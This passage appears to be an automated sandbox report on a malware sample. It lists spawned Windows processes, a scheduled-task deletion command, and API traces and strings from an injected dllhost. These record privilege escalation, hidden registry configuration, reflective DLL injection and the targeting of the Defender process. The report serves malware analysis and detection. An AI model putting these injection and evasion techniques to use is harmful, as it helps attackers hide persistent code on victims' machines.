Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	03:17:24
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	03:17:25
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	03:17:25
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	03:17:26
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	03:17:26
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	03:17:26
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	03:17:27
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	03:17:28
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	03:17:28
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	03:17:28
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	03:17:29
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	03:17:29
Start date:	09/12/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5}
Imagebase:	0x7ff669820000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	03:17:30
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	03:17:30
Start date:	09/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Imagebase:	0x7ff7b3100000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	03:17:30
Start date:	09/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	03:17:31
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	03:17:31
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	03:17:31
Start date:	09/12/2024
Path:	C:\Windows\System32\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\spoolsv.exe
Imagebase:	0x7ff7f6100000
File size:	842'752 bytes
MD5 hash:	0D4B1E3E4488E9BDC035F23E1F4FE22F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	03:17:32
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	03:17:33
Start date:	09/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	46.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	72.9%
Total number of Nodes:	251
Total number of Limit Nodes:	30

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0000000140002D4C Relevance: 84.3, APIs: 36, Strings: 12, Instructions: 258
registrymemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002A0C: StrCpyW.SHLWAPI ref: 0000000140002A3D
Part of subcall function 0000000140002A0C: StrCatW.SHLWAPI ref: 0000000140002A4B
Part of subcall function 0000000140002A0C: GetModuleHandleW.KERNEL32 ref: 0000000140002A54
Part of subcall function 0000000140002A0C: GetCurrentProcess.KERNEL32 ref: 0000000140002A74
Part of subcall function 0000000140002A0C: K32GetModuleInformation.KERNEL32 ref: 0000000140002A88
Part of subcall function 0000000140002A0C: CreateFileW.KERNELBASE ref: 0000000140002AB8
Part of subcall function 0000000140002A0C: CreateFileMappingW.KERNELBASE ref: 0000000140002AE2
Part of subcall function 0000000140002A0C: MapViewOfFile.KERNELBASE ref: 0000000140002B05
Part of subcall function 0000000140002A0C: lstrcmpiA.KERNEL32 ref: 0000000140002B5B
Part of subcall function 0000000140002A0C: CloseHandle.KERNELBASE ref: 0000000140002BC7
Part of subcall function 0000000140002A0C: CloseHandle.KERNEL32 ref: 0000000140002BD0
Part of subcall function 0000000140002A0C: FreeLibrary.KERNEL32 ref: 0000000140002BD9

Part of subcall function 0000000140002A0C: VirtualProtect.KERNEL32 ref: 0000000140002B8E
Part of subcall function 0000000140002A0C: VirtualProtect.KERNEL32 ref: 0000000140002BBE

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
GetLastError.KERNEL32 ref: 0000000140002DF7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC
RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EFB
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F2B
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F3D
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F43
RegCreateKeyExW.KERNELBASE ref: 0000000140002F7F
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000140002FA6
RegSetKeySecurity.KERNELBASE ref: 0000000140002FBF
LocalFree.KERNEL32 ref: 0000000140002FC9
RegCreateKeyExW.KERNELBASE ref: 0000000140002FFF
GetCurrentProcessId.KERNEL32 ref: 0000000140003009
RegSetValueExW.KERNELBASE ref: 0000000140003030
RegCloseKey.KERNELBASE ref: 000000014000303A
RegCloseKey.ADVAPI32 ref: 0000000140003044
CreateThread.KERNELBASE ref: 0000000140003065
GetProcessHeap.KERNEL32 ref: 000000014000306B
HeapAlloc.KERNEL32 ref: 000000014000307A
CreateThread.KERNELBASE ref: 00000001400030A8
CreateThread.KERNELBASE ref: 00000001400030C9
ShellExecuteW.SHELL32 ref: 0000000140003103
GetProcessHeap.KERNEL32 ref: 0000000140003163
HeapFree.KERNEL32 ref: 0000000140003171
SleepEx.KERNELBASE ref: 000000014000317A

Strings

SeDebugPrivilege, xrefs: 0000000140002DAE
SOFTWARE\$nya-config, xrefs: 0000000140002F5E
kernel32.dll, xrefs: 0000000140002D68
$nya-dll64, xrefs: 0000000140002E77, 0000000140002F10
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 0000000140002F9F
?, xrefs: 0000000140002FF3
open, xrefs: 00000001400030E4
ntdll.dll, xrefs: 0000000140002D5C
$nya-dll32, xrefs: 0000000140002E47, 0000000140002ED6
svc64, xrefs: 0000000140003013
SOFTWARE, xrefs: 0000000140002E1F
pid, xrefs: 0000000140002FDC

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
String ID: $nya-dll32$$nya-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$nya-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
API String ID: 3658652915-3222643892
Opcode ID: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
Instruction ID: 4f21af1d6324345a54d8493184232a85d4bbe7b60dd5b863780ff56615b54280
Opcode Fuzzy Hash: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
Instruction Fuzzy Hash: A5C1F2B2200A4086EB26DF22F8547DA37A5FB8CBD9F414116FB4A43A76DF38C589C744

Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32 ref: 000000014000189E
IsWow64Process.KERNEL32 ref: 00000001400018BA
CloseHandle.KERNEL32 ref: 00000001400018DE
OpenProcess.KERNEL32 ref: 0000000140001939
OpenProcess.KERNEL32 ref: 0000000140001958
K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
PathFindFileNameW.SHLWAPI ref: 0000000140001987
lstrlenW.KERNEL32 ref: 0000000140001993
StrCpyW.SHLWAPI ref: 00000001400019AA
CloseHandle.KERNEL32 ref: 00000001400019B6
StrCmpIW.SHLWAPI ref: 00000001400019EA
NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
OpenProcessToken.ADVAPI32 ref: 0000000140001A43
GetTokenInformation.KERNELBASE ref: 0000000140001A6F
GetLastError.KERNEL32 ref: 0000000140001A79
LocalAlloc.KERNEL32 ref: 0000000140001A8C
GetTokenInformation.KERNELBASE ref: 0000000140001AB8
GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
LocalFree.KERNEL32 ref: 0000000140001AEC
CloseHandle.KERNEL32 ref: 0000000140001B00
StrStrA.SHLWAPI ref: 0000000140001BAB
VirtualAllocEx.KERNEL32 ref: 0000000140001C15
WriteProcessMemory.KERNELBASE ref: 0000000140001C38
WaitForSingleObject.KERNEL32 ref: 0000000140001C79
GetExitCodeThread.KERNEL32 ref: 0000000140001C8F
VirtualFreeEx.KERNELBASE ref: 0000000140001CB1
CloseHandle.KERNELBASE ref: 0000000140001CC2
CloseHandle.KERNEL32 ref: 0000000140001CCB

Strings

MSBuild.exe, xrefs: 00000001400019D4
MsMpEng.exe, xrefs: 00000001400019C1
ReflectiveDllMain, xrefs: 0000000140001BA1
@, xrefs: 0000000140001C08

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
API String ID: 2456419452-2628171563
Opcode ID: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
Instruction ID: aa2e9c602b366f086df46edbb2d603c4cad306d9795ea9e87325920370297f3c
Opcode Fuzzy Hash: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
Instruction Fuzzy Hash: 93C14BB1700A8186EB66DF23B8907EA23A5FB89BC4F444125EF4A477A4DF38C985C744

Function 00000001400031D0 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140003230
HeapAlloc.KERNEL32 ref: 0000000140003243
K32EnumProcesses.KERNEL32 ref: 0000000140003260

Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 000000014000189E
Part of subcall function 0000000140001868: IsWow64Process.KERNEL32 ref: 00000001400018BA
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 00000001400018DE
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001939
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001958
Part of subcall function 0000000140001868: K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
Part of subcall function 0000000140001868: PathFindFileNameW.SHLWAPI ref: 0000000140001987
Part of subcall function 0000000140001868: lstrlenW.KERNEL32 ref: 0000000140001993
Part of subcall function 0000000140001868: StrCpyW.SHLWAPI ref: 00000001400019AA
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 00000001400019B6
Part of subcall function 0000000140001868: StrCmpIW.SHLWAPI ref: 00000001400019EA

Part of subcall function 0000000140001868: NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
Part of subcall function 0000000140001868: OpenProcessToken.ADVAPI32 ref: 0000000140001A43
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001A6F
Part of subcall function 0000000140001868: GetLastError.KERNEL32 ref: 0000000140001A79
Part of subcall function 0000000140001868: LocalAlloc.KERNEL32 ref: 0000000140001A8C
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001AB8
Part of subcall function 0000000140001868: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
Part of subcall function 0000000140001868: GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
Part of subcall function 0000000140001868: LocalFree.KERNEL32 ref: 0000000140001AEC
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 0000000140001B00
Part of subcall function 0000000140001868: StrStrA.SHLWAPI ref: 0000000140001BAB

ReadFile.KERNEL32 ref: 00000001400032DE
ExitProcess.KERNEL32 ref: 000000014000334E
ReadFile.KERNELBASE ref: 0000000140003371
GetProcessHeap.KERNEL32 ref: 0000000140003392
HeapAlloc.KERNEL32 ref: 00000001400033A3
GetProcessHeap.KERNEL32 ref: 00000001400033FA
HeapFree.KERNEL32 ref: 0000000140003408
RegOpenKeyExW.ADVAPI32 ref: 000000014000346F
RegDeleteValueW.ADVAPI32 ref: 0000000140003487
RegDeleteValueW.ADVAPI32 ref: 000000014000349B
RegDeleteValueW.ADVAPI32 ref: 00000001400034AF

Strings

$nya-stager, xrefs: 0000000140003480
$nya-dll64, xrefs: 00000001400034A8
open, xrefs: 0000000140003608
$nya-dll32, xrefs: 0000000140003494
SOFTWARE, xrefs: 0000000140003461
$nya-svc32, xrefs: 00000001400034B5
$nya-svc64, xrefs: 00000001400034C1

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$Open$File$AllocCloseDeleteHandleInformationTokenValue$AuthorityFreeLocalNameRead$CountEnumErrorExitFindLastModulePathProcessesQueryWow64lstrlen
String ID: $nya-dll32$$nya-dll64$$nya-stager$$nya-svc32$$nya-svc64$SOFTWARE$open
API String ID: 2078740077-1712970621
Opcode ID: 91b41d522b7d0f56bb1f99e19882e001774b43b5b119cf9b6761b33b35494708
Instruction ID: c8d4f342e40e6777a9670b8351b23a9f9beb54452381f7607bad1af34793ce04
Opcode Fuzzy Hash: 91b41d522b7d0f56bb1f99e19882e001774b43b5b119cf9b6761b33b35494708
Instruction Fuzzy Hash: 0FB106F120468196EB7BDF27B8543E922A9F74C7C4F448125BB0A47ABADF39C645C704

Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001D23
HeapAlloc.KERNEL32 ref: 0000000140001D36
GetProcessHeap.KERNEL32 ref: 0000000140001D44
HeapAlloc.KERNEL32 ref: 0000000140001D55
K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
OpenProcess.KERNEL32 ref: 0000000140001D9D
K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
ReadProcessMemory.KERNEL32 ref: 0000000140001E01
CloseHandle.KERNELBASE ref: 0000000140001E46
GetProcessHeap.KERNEL32 ref: 0000000140001E58
RtlFreeHeap.NTDLL ref: 0000000140001E66
GetProcessHeap.KERNEL32 ref: 0000000140001E6C
RtlFreeHeap.NTDLL ref: 0000000140001E7A

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
Instruction ID: e2e15449054ed3f9ee7818d53de513bd52f9f3644679b514a33cb2e068489f8a
Opcode Fuzzy Hash: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
Instruction Fuzzy Hash: 1B5158B2711A808AEB66DF63F8587EA22A1F78DBC4F804025EF595B764DF38C585C700

Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
LocalAlloc.KERNEL32 ref: 00000001400023A7
InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Memory Dump Source

Source File: 00000007.00000002.2319858293.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2319330258.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320130898.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2320217361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001527
HeapAlloc.KERNEL32 ref: 0000000140001536

Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

RegOpenKeyExW.ADVAPI32 ref: 00000001400015A6
RegOpenKeyExW.ADVAPI32 ref: 00000001400015D3
RegCloseKey.ADVAPI32 ref: 00000001400015ED
RegOpenKeyExW.ADVAPI32 ref: 000000014000160D
RegCloseKey.KERNELBASE ref: 0000000140001628
RegOpenKeyExW.ADVAPI32 ref: 0000000140001648
RegCloseKey.ADVAPI32 ref: 0000000140001663
RegOpenKeyExW.ADVAPI32 ref: 0000000140001683
RegCloseKey.ADVAPI32 ref: 000000014000169E
RegOpenKeyExW.ADVAPI32 ref: 00000001400016BE
RegCloseKey.ADVAPI32 ref: 00000001400016D9
RegOpenKeyExW.ADVAPI32 ref: 00000001400016F9
RegCloseKey.ADVAPI32 ref: 0000000140001714
RegOpenKeyExW.ADVAPI32 ref: 0000000140001734
RegCloseKey.ADVAPI32 ref: 000000014000174F
RegOpenKeyExW.ADVAPI32 ref: 000000014000176F
RegCloseKey.ADVAPI32 ref: 000000014000178A
RegCloseKey.ADVAPI32 ref: 0000000140001794

Part of subcall function 0000000140001274: RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
